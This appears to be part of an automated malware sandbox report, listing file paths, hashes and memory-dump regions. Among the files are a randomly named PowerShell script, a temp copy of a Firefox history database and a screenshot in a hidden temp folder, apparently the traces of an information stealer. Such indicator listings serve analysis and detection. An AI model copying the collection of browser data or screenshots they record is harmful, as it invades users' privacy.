SHA512 7a11b39011d38800e1b8b66f7180e06c2b050a98388075aa5ee9e2919f2668cd4514d0420461f508837fb56e82e885f8d91b7b3b182d1629e505d2b25576a79e

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 44e60da605d8b8d00c512c8b74b754b0
SHA1 7241e633643bb1a1c6f05862a314cc8199989048
SHA256 69f159ea29c60140a955f6ac1880c054816e9ea3786249b7108b687e1a9300fa
SHA512 c8236dba4eb2c150551b555c2a5a7777dd903ded1404850acb68dfdd32df9a661b2a15b1dec98f4414a4f97fabec10defb541e1e0be2351ab76b1c9539e20582

memory/3528-721-0x00007FF994B10000-0x00007FF9955D1000-memory.dmp

memory/5100-722-0x00007FF994B10000-0x00007FF9955D1000-memory.dmp

memory/5100-723-0x000001D469BB0000-0x000001D469BC0000-memory.dmp

memory/3528-724-0x0000018284930000-0x0000018284940000-memory.dmp

memory/4144-743-0x00007FF994B10000-0x00007FF9955D1000-memory.dmp

memory/4340-771-0x00007FF994B10000-0x00007FF9955D1000-memory.dmp

memory/3528-772-0x0000018284930000-0x0000018284940000-memory.dmp

memory/1092-774-0x00007FF994B10000-0x00007FF9955D1000-memory.dmp

memory/3528-775-0x0000018284930000-0x0000018284940000-memory.dmp

memory/1092-776-0x000001F438360000-0x000001F438370000-memory.dmp

memory/5100-777-0x000001D469BB0000-0x000001D469BC0000-memory.dmp

memory/4340-778-0x0000015EADFC0000-0x0000015EADFD0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\QiPMCnXAvLr6_temp.ps1

MD5 cd99a99a8633d352bd6598a48849103f
SHA1 ee17de1c242631618d3efde4f38b9d5b78ba8712
SHA256 8b1f9cf1763a9763ee67ad01b1f3c4d58b7362c998e35e8c52b6917d5328ee6a
SHA512 2bacf93af6e65324ba1da47f9faf0a0f504a283031272c04dbfa0bdf7206b7c1bc69c81d5bb7ec66458e1803a39f2c3f1cd416eb9c260079d64a8c33ed868da2

memory/1580-780-0x00007FF994B10000-0x00007FF9955D1000-memory.dmp

memory/1580-781-0x00000206D4870000-0x00000206D4880000-memory.dmp

memory/1580-782-0x00000206D4870000-0x00000206D4880000-memory.dmp

memory/1580-792-0x00000206D4870000-0x00000206D4880000-memory.dmp

memory/4340-794-0x00007FF994B10000-0x00007FF9955D1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e5ea61f668ad9fe64ff27dec34fe6d2f
SHA1 5d42aa122b1fa920028b9e9514bd3aeac8f7ff4b
SHA256 8f161e4c74eb4ca15c0601ce7a291f3ee1dc0aa46b788181bfe1d33f2b099466
SHA512 cb308188323699eaa2903424527bcb40585792f5152aa7ab02e32f94a0fcfe73cfca2c7b3cae73a9df3e307812dbd18d2d50acbbfeb75d87edf1eb83dd109f34

memory/5100-801-0x00007FF994B10000-0x00007FF9955D1000-memory.dmp

memory/3528-802-0x00007FF994B10000-0x00007FF9955D1000-memory.dmp

memory/1580-806-0x00007FF994B10000-0x00007FF9955D1000-memory.dmp

memory/4672-807-0x00007FF994B10000-0x00007FF9955D1000-memory.dmp

memory/4672-808-0x000001D6CECA0000-0x000001D6CECB0000-memory.dmp

memory/1092-815-0x00007FF994B10000-0x00007FF9955D1000-memory.dmp

memory/4672-812-0x000001D6CECA0000-0x000001D6CECB0000-memory.dmp

memory/4144-816-0x00007FF994B10000-0x00007FF9955D1000-memory.dmp

memory/4672-827-0x000001D6CECA0000-0x000001D6CECB0000-memory.dmp

memory/4672-829-0x00007FF994B10000-0x00007FF9955D1000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x3x6afp6.default-release\places.sqlite_tmp

MD5 576a220581b64abf92aa530617bf7c49
SHA1 848e29c973a1b5a9b33635fcd623d37d4cd6ae4b
SHA256 ee41df441842f25738bb9dc57e6394d4a75a2507dc775a277a2807974de255fd
SHA512 e157c8d87d6a33af5c9bedbd77fb02de1f23d14b71d184a54855fcbcd47ebde7785b532e3354f3cab3201286206e27bef3a9a70761ce080401d0f84c0871654d

C:\Users\Admin\AppData\Local\Temp\6MdARMAOMl7mvRDzbZK9\System\NUPNSVML - 2023-12-18_181432.png

MD5 fb9b44c2543e2734d903575093a0628d
SHA1 e0d60c85809796348c266001de9ac7214f52b785
SHA256 9a0be648ad1c2ec45a99d5c0038517f74ad1101e255ba3b8f9418931166fbd61
SHA512 dcb1fe844d550a42d035d79a69ba468b451b513ed6d0b8a5afdd08586d006e7b8ece6f04a6cc77ad3df27e450ed7028979ee859fc1e4cb03216531096dd04532